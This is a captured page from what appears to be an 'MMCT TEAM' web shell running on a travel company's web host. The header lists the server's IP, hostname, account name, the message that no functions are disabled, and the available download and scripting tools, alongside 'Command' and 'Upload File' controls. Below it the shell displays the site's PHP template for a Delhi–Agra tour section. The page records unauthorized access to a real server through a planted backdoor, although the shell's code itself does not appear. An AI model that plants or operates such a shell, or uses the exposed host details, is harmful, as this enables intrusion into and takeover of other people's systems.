MMCT TEAM
Server IP : 103.53.40.154  /  Your IP : 3.135.209.107
Web Server : Apache
System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
User : ppcad7no ( 715)
PHP Version : 8.2.25
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0750) :  /home2/ppcad7no/instabus.in/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home2/ppcad7no/instabus.in/index-same-day-tour-section.php

 <!-- Blog Area Start -->
    <section class="peulis-blog-area section_70">
        <div class="container">
            <div class="row">
                <div class="col-lg-12">
                    <div class="site-heading">
                        <h2>Same Day Delhi to Agra Tour Package By Bus Includes</h2>
                        <p>Our packages at InstaBus.In include : Delhi Sightseeing Tour, Delhi To Jaipur One Day Tour, Delhi To Haridwar Tour, Delhi To Agra One Day Tour, Delhi To Manali Volvo Bus.</p>
                    </div>
                </div>
            </div>
            <div class="row">
                
                
                
                <?php
   $sql_inc=db_query("select * from tbl_package_includes where 1 and status='Active'  order by id asc");
   while($inc_res=mysqli_fetch_array($sql_inc)){
  ?>
                <div class="col-lg-3">
                    <div class="single-blog-item">
                        <div class="blog-image">
                            <a href="<?=$site_url?>/package_include_images/<?=$inc_res['image_name']?>" target="_blank">
                                <img src="<?=$site_url?>/package_include_images/<?=$inc_res['image_name']?>" alt="<?=$inc_res['name']?>" />
                            </a>
                        </div>
                        <div class="blog-desc">
                            
                            <h3><a href="<?=$inc_res['link']?>"><?=$inc_res['name']?></a></h3>
                          <?=$inc_res['description']?>
                        </div>
                    </div>
                </div>
<?}?>
                
                
            <!--    <div class="col-lg-4">
                    <div class="single-blog-item">
                        <div class="blog-image">
                            <a href="<?=$site_url?>/same_day_tour_images/mathura.jpg" target="_blank">
                                <img src="<?=$site_url?>/same_day_tour_images/mathura.jpg" alt="Mathura" />
                            </a>
                        </div>
                        <div class="blog-desc">
                           
                            <h3><a href="#">Mathura</a></h3>
                            <p>Mathura is a sacred city in Uttar Pradesh, northern India. The deity Lord Krishna is said to have been born on the site of Sri Krishna Janma Bhoomi, a Hindu temple. Dotting the Yamuna River are 25 ghats (flights of steps down to the water), of which Vishram Ghat is considered the holiest.</p>
                        </div>
                    </div>
                </div>

                  <div class="col-lg-4">
                    <div class="single-blog-item">
                        <div class="blog-image">
                         <a href="<?=$site_url?>/same_day_tour_images/vrindavan.jpg" target="_blank">
                                <img src="<?=$site_url?>/same_day_tour_images/vrindavan.jpg" alt="Vrindavan" />
                            </a>
                        </div>
                        <div class="blog-desc">
                          
                            <h3><a href="#">Vrindavan</a></h3>
                            <p>Vrindavan is a holy town in Uttar Pradesh, northern India. The Hindu deity Krishna is said to have spent his childhood here. It’s home to temples, many dedicated to Krishna and his lover, the deity Radha. At Banke Bihari Temple, the curtain in front of Krishna’s statue is opened and closed every few minutes.</p>
                        </div>
                    </div>
                </div>-->


            </div>
        </div>
    </section>
    <!-- Blog Area End -->


MMCT - 2023